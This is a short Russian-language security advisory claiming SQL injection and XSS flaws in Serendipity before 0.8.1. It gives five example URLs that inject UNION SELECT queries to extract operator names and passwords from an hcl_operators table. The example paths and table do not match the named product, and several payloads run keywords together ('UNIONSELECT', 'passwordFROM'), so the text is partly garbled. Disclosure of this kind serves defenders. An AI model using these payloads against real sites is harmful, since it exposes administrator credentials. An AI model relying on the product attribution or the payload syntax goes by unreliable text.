Программа: Serendipity версии до 0.8.1

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных приложения. SQL-инъекция возможна при
выключенной опции magic_quotes_gpc в
конфигурационном файле php. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды в базе данных приложения.

Примеры:

http://[target]/support/faq/index.php?x=f&id=-99’%20UNION%20
SELECT%200,0,operator,password%20FROM%20hcl_operators%20WHERE%201/*

http://[target]/support/tt/view.php?tid=-99’%20UNION%20
SELECT%200,0,0,operator,password,0,0,0,0,0%20FROM %20hcl_operators%20WHERE%201/*

http://[target]/support/tt/download.php?fid=-99’%20UNION
%20SELECT%200,0,0,password,0,operator,0,0%20FROM
%20hcl_operators%20WHERE%20id=’1

http://[target]/support/lh/icon.php?status=-99′ UNIONSELECT password,password
FROM hcl_operators WHERE id=1/*

http://[target]/support/lh/chat_download.php?fid=-99’UNION SELECT password,
operator,passwordFROM hcl_operators WHERE id=1/*

Межсайтовый скриптинг возможен из-за
недостаточной фильтрации HTML символов в
некоторых переменных. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.



Оставить мнение